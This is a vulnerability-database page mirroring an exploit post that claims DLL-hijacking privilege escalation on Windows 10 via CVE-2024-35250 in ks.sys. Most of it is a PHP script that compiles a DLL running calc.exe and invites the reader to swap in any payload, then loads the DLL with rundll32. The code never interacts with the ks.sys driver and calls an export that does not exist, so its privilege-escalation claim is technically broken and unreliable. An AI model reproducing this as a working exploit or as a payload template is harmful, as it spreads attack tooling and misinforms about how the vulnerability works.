📄 Microsoft Windows 10 Famille 10.0.19045.5487 DLL Hijacking

🗓️ 02 Dec 2025 00:00:00Reported by indoushkaType

packetstorm🔗 packetstorm.news👁 140 Views

Privilege escalation on Windows via DLL hijacking in ks.sys driver (CVE-2024-35250) affecting Windows 10 and 11.

Reporter	Title	Published	Views	Family All 66
GithubExploit	Exploit for Untrusted Pointer Dereference in Microsoft	27 Feb 202613:05	–	githubexploit
GithubExploit	Exploit for Untrusted Pointer Dereference in Microsoft	23 Nov 202412:12	–	githubexploit
GithubExploit	Exploit for Untrusted Pointer Dereference in Microsoft	25 Oct 202410:06	–	githubexploit
ATTACKERKB	CVE-2024-35250	11 Jun 202400:00	–	attackerkb
Information Security Automation	New episode “In The Trend of VM” (#9): 4 trending vulnerabilities of October, scandal at The Linux Foundation, social “attack on the complainer”, “Ford’s method” for motivating IT specialists to fix vulnerabilities	28 Nov 202412:57	–	avleonov
Information Security Automation	The severity of the Elevation of Privilege – Windows Kernel-Mode Driver (CVE-2024-35250) vulnerability has increased	22 Oct 202420:07	–	avleonov
Circl	CVE-2024-35250	15 Oct 202419:03	–	circl
CISA KEV Catalog	Microsoft Windows Kernel-Mode Driver Untrusted Pointer Dereference Vulnerability	16 Dec 202400:00	–	cisa_kev
CISA	CISA Adds Two Known Exploited Vulnerabilities to Catalog	16 Dec 202412:00	–	cisa
CNNVD	Microsoft Windows Kernel Mode Drivers Security Vulnerability	11 Jun 202400:00	–	cnnvd

=============================================================================================================================================
    | # Title     : Microsoft Windows 10 Famille 10.0.19045.5487 (DLL Hijacking) Privilege Escalation                                           |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits)                                                            |
    | # Vendor    : https://www.Microsoft.com                                                                                                   |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking İn Google Or Other Search Enggine.
    
    [+] Code Description: The ks.sys driver on Microsoft Windows is one of the core components of Kernel Streaming and is installed by default. 
    
        There exists a local privilege escalation vulnerability in this driver that can be exploited on many recent versions of Windows 10, Windows 11, Windows Server 2022.
    
    [+] What's new in this version?
    
        Added DLL Hijacking exploit inside the code
    	
        Create a malicious DLL library directly from inside the code
    
        Use rundll32.exe to automatically load the payload
    
        Ensure all possible environments are supported (Windows 10 and 11)
    
        Improved compatibility with different languages
    
        (Related : https://packetstorm.news/files/id/182984/ Related CVE numbers: 	CVE-2024-35250) .
    
    
    [+] Usage : php poc.php
    
    [+] PayLoad :
    
    <?php
    /**
     * استغلال ثغرة CVE-2024-35250 في Windows مع دعم جميع اللغات + DLL Hijacking
     */
    
    function getWindowsLCID() {
        $output = shell_exec('wmic os get locale /value');
        preg_match('/Locale=(\w+)/', $output, $matches);
        return isset($matches[1]) ? hexdec($matches[1]) : 1033; // 
    }
    
    function localeToLanguage($locale) {
        $languages = [
            1033 => ['English', 'C:\\Users\\Public\\'], // en-US
            1036 => ['French', 'C:\\Utilisateurs\\Public\\'], // fr-FR
            3082 => ['Spanish', 'C:\\Usuarios\\Public\\'], // es-ES
            1046 => ['Portuguese', 'C:\\Usuários\\Public\\'], // pt-BR
            1031 => ['German', 'C:\\Benutzer\\Öffentlich\\'], // de-DE
            1049 => ['Russian', 'C:\\Пользователи\\Общие\\'], // ru-RU
            1056 => ['Persian', 'C:\\کاربران\\عمومی\\'], // fa-IR
            1025 => ['Arabic', 'C:\\المستخدمون\\عام\\'], // ar-SA
            1101 => ['Hindi', 'C:\\Users\\Public\\'], // hi-IN
            1114 => ['Aramaic', 'C:\\משתמשים\\ציבורי\\'], // الآرامية
            1037 => ['Hebrew', 'C:\\משתמשים\\ציבורי\\'], // he-IL
            2052 => ['Chinese (Simplified)', 'C:\\用户\\公共\\'], // zh-CN
            1028 => ['Chinese (Traditional)', 'C:\\使用者\\公用\\'], // zh-TW
            1041 => ['Japanese', 'C:\\ユーザー\\パブリック\\'], // ja-JP
            1042 => ['Korean', 'C:\\사용자\\공용\\'], // ko-KR
            1054 => ['Thai', 'C:\\ผู้ใช้\\สาธารณะ\\'], // th-TH
            1066 => ['Vietnamese', 'C:\\Người dùng\\Công cộng\\'], // vi-VN
        ];
    
        return $languages[$locale] ?? ['Unknown', 'C:\\Users\\Public\\']; // 
    }
    
    function getPublicPath() {
        $locale = getWindowsLCID();
        list($lang, $path) = localeToLanguage($locale);
        echo "[+] لغة النظام: $lang (LCID: $locale)\n";
        return $path;
    }
    
    function is64BitWindows() {
        return (PHP_INT_SIZE === 8);
    }
    
    function checkVulnerableDriver() {
        $winDir = getenv('WINDIR');
        $driverPath = $winDir . '\\system32\\drivers\\ks.sys';
    
        if (!file_exists($driverPath)) {
            die("[X] لم يتم العثور على ks.sys، النظام غير قابل للاستغلال.\n");
        }
    
        echo "[+] ks.sys موجود في المسار: $driverPath\n";
        return true;
    }
    
    function getWindowsBuildNumber() {
        $output = shell_exec('wmic os get BuildNumber /value');
        preg_match('/BuildNumber=(\d+)/', $output, $matches);
        return $matches[1] ?? null;
    }
    
    function isVulnerableVersion($buildNumber) {
        $vulnerableBuilds = range(14393, 19045); // من Windows 10 1607 إلى Windows 10 22H2
        return in_array($buildNumber, $vulnerableBuilds);
    }
    
    function createMaliciousDLL($dllPath) {
        $dllCode = <<<EOD
    #include <windows.h>
    #include <stdlib.h>
    
    BOOL APIENTRY DllMain(HMODULE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved) {
        if (ul_reason_for_call == DLL_PROCESS_ATTACH) {
            system("cmd.exe /c calc.exe"); // استبدل calc.exe بأي حمولة تريد تنفيذها
        }
        return TRUE;
    }
    EOD;
    
        file_put_contents("payload.c", $dllCode);
        shell_exec("gcc -shared -o $dllPath payload.c -mwindows");
    }
    
    function exploit() {
        if (!is64BitWindows()) {
            die("[X] النظام ليس 64 بت، الاستغلال غير ممكن.\n");
        }
    
        if (!checkVulnerableDriver()) {
            die("[X] لا يمكن متابعة الاستغلال.\n");
        }
    
        $buildNumber = getWindowsBuildNumber();
        if (!$buildNumber || !isVulnerableVersion($buildNumber)) {
            die("[X] إصدار Windows غير مدعوم: $buildNumber\n");
        }
    
        echo "[+] تم التحقق من الثغرة، سيتم تنفيذ الهجوم الآن...\n";
    
        $publicPath = getPublicPath();
        $payloadPath = $publicPath . "exploit_payload.dll";
    
        echo "[+] سيتم استخدام المسار: $payloadPath\n";
    
        createMaliciousDLL($payloadPath);
    
        echo "[+] تم إنشاء DLL الضارة بنجاح...\n";
    
        $notepad = shell_exec('start /B notepad.exe'); // تشغيل notepad لاستضافة الـ DLL
        sleep(1);
    
        echo "[+] تم تشغيل Notepad، تنفيذ الحمولة...\n";
        shell_exec("rundll32 $payloadPath,Inject"); // تحميل الحمولة عبر rundll32
    }
    
    exploit();
    ?>
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================

02 Dec 2025 00:00Current

7.9High risk

Vulners AI Score7.9

CVSS 3.17.8

EPSS0.54913